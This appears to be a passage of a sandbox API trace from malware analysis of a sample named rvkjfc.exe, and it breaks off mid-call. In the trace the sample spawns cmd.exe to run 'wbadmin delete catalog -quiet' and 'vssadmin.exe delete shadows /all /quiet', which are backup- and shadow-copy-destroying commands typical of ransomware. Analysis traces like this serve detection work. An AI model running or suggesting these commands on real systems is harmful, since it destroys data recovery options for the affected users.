_wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0045.003] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0045.003] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0045.003] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0045.003] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0045.003] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0045.003] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0045.003] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0045.003] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0045.003] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0045.003] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0045.003] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0045.004] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0045.004] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0045.004] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0045.004] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0045.004] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0045.004] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0045.004] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0045.004] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0045.004] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0045.004] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0045.004] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0045.004] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0045.004] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0045.004] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0045.004] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0045.004] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0045.004] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0045.004] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0045.004] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0045.004] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0045.004] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0045.004] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0045.004] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0045.004] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0045.004] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0045.004] GetProcessHeap () returned 0x70000 [0045.004] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x89950 [0045.004] GetProcessHeap () returned 0x70000 [0045.004] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4e) returned 0x89b70 [0045.005] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0045.005] GetProcessHeap () returned 0x70000 [0045.005] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x420) returned 0x71320 [0045.005] SetErrorMode (uMode=0x0) returned 0x0 [0045.005] SetErrorMode (uMode=0x1) returned 0x0 [0045.005] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x71330, lpFilePart=0x30ef00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30ef00*="Desktop") returned 0x25 [0045.005] SetErrorMode (uMode=0x0) returned 0x1 [0045.005] GetProcessHeap () returned 0x70000 [0045.005] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x71320, Size=0x6c) returned 0x71320 [0045.005] GetProcessHeap () returned 0x70000 [0045.005] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x71320) returned 0x6c [0045.005] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0045.005] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.006] GetProcessHeap () returned 0x70000 [0045.006] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x128) returned 0x89bd0 [0045.006] GetProcessHeap () returned 0x70000 [0045.006] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x240) returned 0x89d00 [0045.012] GetProcessHeap () returned 0x70000 [0045.012] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x89d00, Size=0x12a) returned 0x89d00 [0045.012] GetProcessHeap () returned 0x70000 [0045.012] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x89d00) returned 0x12a [0045.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.012] GetProcessHeap () returned 0x70000 [0045.012] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe8) returned 0x89e40 [0045.012] GetProcessHeap () returned 0x70000 [0045.012] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x89e40, Size=0x7e) returned 0x89e40 [0045.012] GetProcessHeap () returned 0x70000 [0045.012] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x89e40) returned 0x7e [0045.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.013] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x30ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec70) returned 0xffffffffffffffff [0045.013] GetLastError () returned 0x2 [0045.013] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x30ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec70) returned 0xffffffffffffffff [0045.013] GetLastError () returned 0x2 [0045.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.013] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x30ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec70) returned 0x89ed0 [0045.013] GetProcessHeap () returned 0x70000 [0045.013] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x28) returned 0x84610 [0045.013] FindClose (in: hFindFile=0x89ed0 | out: hFindFile=0x89ed0) returned 1 [0045.013] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x30ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec70) returned 0xffffffffffffffff [0045.013] GetLastError () returned 0x2 [0045.013] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ec70) returned 0x89ed0 [0045.013] GetProcessHeap () returned 0x70000 [0045.013] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x84610, Size=0x8) returned 0x88900 [0045.014] FindClose (in: hFindFile=0x89ed0 | out: hFindFile=0x89ed0) returned 1 [0045.014] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0045.014] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0045.014] GetConsoleTitleW (in: lpConsoleTitle=0x30f1c0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.014] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ef78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30ef38 | out: lpAttributeList=0x30ef78, lpSize=0x30ef38) returned 1 [0045.014] UpdateProcThreadAttribute (in: lpAttributeList=0x30ef78, dwFlags=0x0, Attribute=0x60001, lpValue=0x30ef28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ef78, lpPreviousValue=0x0) returned 1 [0045.014] GetStartupInfoW (in: lpStartupInfo=0x30f090 | out: lpStartupInfo=0x30f090*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0045.014] GetProcessHeap () returned 0x70000 [0045.014] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x84610 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.014] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.015] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.015] GetProcessHeap () returned 0x70000 [0045.015] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x84610 | out: hHeap=0x70000) returned 1 [0045.015] GetProcessHeap () returned 0x70000 [0045.015] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x12) returned 0x89ed0 [0045.015] lstrcmpW (lpString1="\\wbadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.016] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30efb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ef60 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x30ef60*(hProcess=0x54, hThread=0x50, dwProcessId=0x244, dwThreadId=0x7c8)) returned 1 [0045.050] CloseHandle (hObject=0x50) returned 1 [0045.050] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.050] GetProcessHeap () returned 0x70000 [0045.050] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8c230 | out: hHeap=0x70000) returned 1 [0045.050] GetEnvironmentStringsW () returned 0x8ac30* [0045.050] GetProcessHeap () returned 0x70000 [0045.050] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xae8) returned 0x8b720 [0045.050] FreeEnvironmentStringsW (penv=0x8ac30) returned 1 [0045.050] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0066.463] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x30eea8 | out: lpExitCode=0x30eea8*=0x0) returned 1 [0066.463] CloseHandle (hObject=0x54) returned 1 [0066.463] _vsnwprintf (in: _Buffer=0x30f118, _BufferCount=0x13, _Format="%08X", _ArgList=0x30eeb8 | out: _Buffer="00000000") returned 8 [0066.463] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0066.463] GetProcessHeap () returned 0x70000 [0066.463] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8b720 | out: hHeap=0x70000) returned 1 [0066.463] GetEnvironmentStringsW () returned 0x8ac30* [0066.463] GetProcessHeap () returned 0x70000 [0066.463] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0e) returned 0x8b750 [0066.463] FreeEnvironmentStringsW (penv=0x8ac30) returned 1 [0066.463] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0066.463] GetProcessHeap () returned 0x70000 [0066.463] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8b750 | out: hHeap=0x70000) returned 1 [0066.463] GetEnvironmentStringsW () returned 0x8ac30* [0066.464] GetProcessHeap () returned 0x70000 [0066.464] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0e) returned 0x8b750 [0066.464] FreeEnvironmentStringsW (penv=0x8ac30) returned 1 [0066.464] GetProcessHeap () returned 0x70000 [0066.464] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x89ed0 | out: hHeap=0x70000) returned 1 [0066.464] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ef78 | out: lpAttributeList=0x30ef78) [0066.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0066.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0066.464] SetConsoleInputExeNameW () returned 0x1 [0066.464] GetConsoleOutputCP () returned 0x1b5 [0066.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0066.465] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0066.465] exit (_Code=0) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x33196000" os_pid = "0x568" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x6ec [0044.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef8b0 | out: lpSystemTimeAsFileTime=0x1ef8b0*(dwLowDateTime=0x2713cad0, dwHighDateTime=0x1d5f247)) [0044.986] GetCurrentProcessId () returned 0x568 [0044.986] GetCurrentThreadId () returned 0x6ec [0044.986] GetTickCount () returned 0x1145d5d [0044.986] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef8b8 | out: lpPerformanceCount=0x1ef8b8*=16584827470) returned 1 [0044.988] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0044.988] __set_app_type (_Type=0x1) [0044.988] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0044.988] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0044.988] GetCurrentThreadId () returned 0x6ec [0044.988] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6ec) returned 0x3c [0044.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0044.988] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0044.988] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0044.989] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.989] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef848 | out: phkResult=0x1ef848*=0x0) returned 0x2 [0044.989] VirtualQuery (in: lpAddress=0x1ef830, lpBuffer=0x1ef7b0, dwLength=0x30 | out: lpBuffer=0x1ef7b0*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.989] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef7b0, dwLength=0x30 | out: lpBuffer=0x1ef7b0*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.989] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef7b0, dwLength=0x30 | out: lpBuffer=0x1ef7b0*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.989] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef7b0, dwLength=0x30 | out: lpBuffer=0x1ef7b0*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.989] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef7b0, dwLength=0x30 | out: lpBuffer=0x1ef7b0*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.989] GetConsoleOutputCP () returned 0x1b5 [0044.989] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.989] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0044.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.989] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0044.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.990] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0044.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.990] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0044.990] _get_osfhandle (_FileHandle=0) returned 0x3 [0044.990] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0044.990] GetEnvironmentStringsW () returned 0x2eaa50* [0044.990] GetProcessHeap () returned 0x2d0000 [0044.990] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2eb4e0 [0044.991] FreeEnvironmentStringsW (penv=0x2eaa50) returned 1 [0044.991] GetProcessHeap () returned 0x2d0000 [0044.991] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2ebf70 [0044.991] GetEnvironmentStringsW () returned 0x2eaa50* [0044.991] GetProcessHeap () returned 0x2d0000 [0044.991] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2ebf90 [0044.991] FreeEnvironmentStringsW (penv=0x2eaa50) returned 1 [0044.991] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee708 | out: phkResult=0x1ee708*=0x44) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x18, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x1, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x1, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x0, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x40, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x40, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x40, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.991] RegCloseKey (hKey=0x44) returned 0x0 [0044.991] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee708 | out: phkResult=0x1ee708*=0x44) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x40, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x1, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x1, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.991] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x0, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.992] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x9, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.992] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x4, lpData=0x1ee720*=0x9, lpcbData=0x1ee704*=0x4) returned 0x0 [0044.992] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee700, lpData=0x1ee720, lpcbData=0x1ee704*=0x1000 | out: lpType=0x1ee700*=0x0, lpData=0x1ee720*=0x9, lpcbData=0x1ee704*=0x1000) returned 0x2 [0044.992] RegCloseKey (hKey=0x44) returned 0x0 [0044.992] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0044.992] srand (_Seed=0x5e5fdfec) [0044.992] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet" [0044.992] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet" [0044.992] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.992] GetProcessHeap () returned 0x2d0000 [0044.992] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 